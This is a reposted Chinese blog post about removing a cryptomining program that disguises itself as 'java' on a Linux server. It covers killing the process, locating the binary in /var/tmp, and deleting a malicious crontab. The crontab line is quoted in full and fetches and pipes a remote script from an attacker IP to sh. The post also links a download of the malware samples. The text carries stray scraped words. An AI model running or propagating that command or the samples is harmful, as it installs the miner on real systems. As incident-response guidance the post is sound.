完全清除挖礦程序

時間 2019-11-05

標籤完全清除程序简体版

原文原文鏈接

轉自：https://blog.csdn.net/zzf1510711060/article/details/83015700java

一：殺死挖礦程序進程
在服務器上使用top指令查看cpu的使用狀況，發現有一個叫java的程序佔用cpu高達99.9%安全

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
5778 root 20 0 373576 2720 404 S 99.9 0.1 1252:00 java
1 root 20 0 43208 3544 2420 S 0.0 0.2 0:04.52 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
3 root 20 0 0 0 0 S 0.0 0.0 0:00.08 ksoftirqd/0
5 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kworker/0:0H
7 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
這個是挖礦程序假裝成java程序，用jps查看java進程的時候並無這個程序。服務器

經過pkill 5778殺死進程ssh

二：刪除挖礦程序
咱們經過cd /proc/5778(這個java挖礦程序的pid)進入到這個進程的目錄而後經過ll命令查看這個進程程序的位置阿里雲

dr-xr-xr-x 2 root root 0 Oct 11 17:24 attr
-rw-r--r-- 1 root root 0 Oct 11 17:24 autogroup
-r-------- 1 root root 0 Oct 11 17:24 auxv
-r--r--r-- 1 root root 0 Oct 11 17:24 cgroup
--w------- 1 root root 0 Oct 11 17:24 clear_refs
-r--r--r-- 1 root root 0 Oct 10 20:18 cmdline
-rw-r--r-- 1 root root 0 Oct 11 17:24 comm
-rw-r--r-- 1 root root 0 Oct 11 17:24 coredump_filter
-r--r--r-- 1 root root 0 Oct 11 17:24 cpuset
lrwxrwxrwx 1 root root 0 Oct 11 17:24 cwd -> /
-r-------- 1 root root 0 Oct 11 17:24 environ
lrwxrwxrwx 1 root root 0 Oct 10 20:18 exe -> /var/tmp/java
dr-x------ 2 root root 0 Oct 10 20:18 fd
dr-x------ 2 root root 0 Oct 11 17:24 fdinfo.net

而後咱們進入這個程序的目錄找到這個程序而後刪除blog

-rwxr-xr-x 1 root root 2386544 Oct 9 15:53 java進程

rm -rf javacrontab

不過作到這裏不久以後這個挖礦程序仍是會死灰復燃ip

三：清除挖礦程序的定時任務
由於你的系統中已經被設置了一個定時任務，定時下載挖礦程序並運行

經過crontab -l 查看該用戶下的全部定時任務

* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1
無時無刻的靜默執行這個cr.sh腳本，還清除了記錄，真的是陰啊！

crontab -r 刪除定時任務

不過我好奇這個腳本里寫了什麼，因而乎修改了一下這個定時任務，把他的腳本下載了下來，發現經過這個腳本又執行了另外一個腳本，還獲得了一個配置文件，再加上假裝成java的挖礦軟件，一共四個東西，我都上傳了，有興趣的能夠下來看下。

https://download.csdn.net/download/zzf1510711060/10714458

最後提醒下，服務器的一些高危端口千萬不要隨便開啓啊，若是用阿里雲搭建集羣的話能夠配置安全組規則，針對於特定的主機開放端口，不要對全部ip開放端口。

四：檢查用戶列表，.ssh文件，開機啓動
cat /etc/passwd 檢查是否有未知用戶